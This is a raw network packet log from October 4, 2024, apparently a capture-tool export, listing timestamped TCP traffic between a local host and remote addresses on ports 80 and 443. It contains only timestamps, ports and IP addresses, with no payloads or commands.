                                                                                                                                            Oct 4, 2024 11:56:13.857706070 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857721090 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857729912 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.857736111 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857750893 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857757092 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.857765913 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857779026 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857785940 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.857794046 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.857817888 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.858319044 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858335972 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858352900 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858365059 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.858367920 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858383894 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858392954 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.858398914 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858413935 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858419895 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.858428001 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858453035 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.858474016 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858489037 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858503103 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858515978 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.858517885 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858531952 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858539104 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.858549118 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.858568907 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.861017942 CEST49171443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:56:13.861027956 CEST44349171213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.863249063 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.941539049 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941606045 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941638947 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941690922 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941721916 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941755056 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941787004 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941792965 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.941838026 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941842079 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.941870928 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941904068 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941922903 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.941936016 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941970110 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.941988945 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942022085 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942054033 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942071915 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942085981 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942120075 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942136049 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942152023 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942184925 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942203045 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942217112 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942249060 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942267895 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942281961 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942313910 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942332983 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942346096 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942378998 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942397118 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942409992 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942441940 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942460060 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942473888 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942507029 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942528009 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942537069 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942569971 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942586899 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942601919 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942634106 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942648888 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942666054 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942717075 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942724943 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942756891 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942789078 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942806959 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942820072 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942852020 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942867041 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942883968 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942915916 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.942934036 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.942950964 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943000078 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.943150997 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943181992 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943213940 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943232059 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.943240881 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943273067 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943300962 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.943305016 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943336964 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943356037 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.943368912 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943417072 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.943437099 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943470001 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943500996 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943517923 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.943532944 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943563938 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943579912 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.943598032 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.943648100 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946019888 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946162939 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946196079 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946214914 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946228981 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946280956 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946331978 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946365118 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946394920 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946413040 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946428061 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946472883 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946476936 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946510077 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946541071 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946558952 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946573973 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946604967 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946621895 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946638107 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946669102 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946679115 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946703911 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946736097 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946752071 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946819067 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946851969 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946868896 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946882963 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946914911 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.946938038 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.946974993 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947024107 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947027922 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947057009 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947088957 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947107077 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947119951 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947170019 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947170973 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947204113 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947235107 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947252035 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947266102 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947298050 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947313070 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947329998 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947361946 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947380066 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947413921 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947446108 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947464943 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947495937 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947527885 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947546959 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947560072 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947591066 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947612047 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947622061 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947654963 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947668076 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947686911 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947720051 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947736025 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947751999 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947783947 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947798014 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947815895 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947848082 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947864056 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947880983 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947911978 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947932005 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.947943926 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947977066 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.947990894 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.948009014 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.948052883 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.948057890 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:13.948081970 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:13.948132038 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.029521942 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029588938 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029623032 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029654026 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029687881 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029720068 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029752016 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029799938 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029831886 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029877901 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029875994 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.029876947 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.029876947 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.029876947 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.029911041 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029927969 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.029944897 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029978037 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.029999018 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.030009031 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030044079 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030061007 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.030143023 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030174971 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030196905 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.030205965 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030237913 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030256987 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.030270100 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030324936 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.030431032 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030462980 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030494928 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030518055 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.030527115 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030559063 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030575991 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.030591011 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030622959 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030639887 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.030658007 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030713081 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.030848980 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030880928 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030911922 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030930042 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.030945063 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030976057 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.030993938 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031008005 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031039953 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031059980 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031069994 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031101942 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031124115 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031132936 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031189919 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031264067 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031312943 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031343937 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031363010 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031375885 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031429052 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031433105 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031466007 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031497955 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031517029 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031528950 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031559944 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031578064 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031590939 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031620979 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031641006 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031779051 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031810999 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031831026 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031842947 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031873941 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031891108 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.031905890 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.031960011 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.032038927 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032087088 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032118082 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032139063 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.032149076 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032180071 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032201052 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.032210112 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032243013 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032259941 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.032274008 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032305956 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032324076 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.032335997 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032368898 CEST8049172192.3.220.20192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.032387018 CEST4917280192.168.2.22192.3.220.20
                                                                                                                                            Oct 4, 2024 11:56:14.049973965 CEST44349171213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.050044060 CEST44349171213.183.76.21192.168.2.22
                                                                                                                                            Oct 4, 2024 11:56:14.050137997 CEST49171443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:56:14.050137997 CEST49171443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:56:14.050564051 CEST49171443192.168.2.22213.183.76.21
                                                                                                                                            Oct 4, 2024 11:56:14.050597906 CEST44349171213.183.76.21192.168.2.22
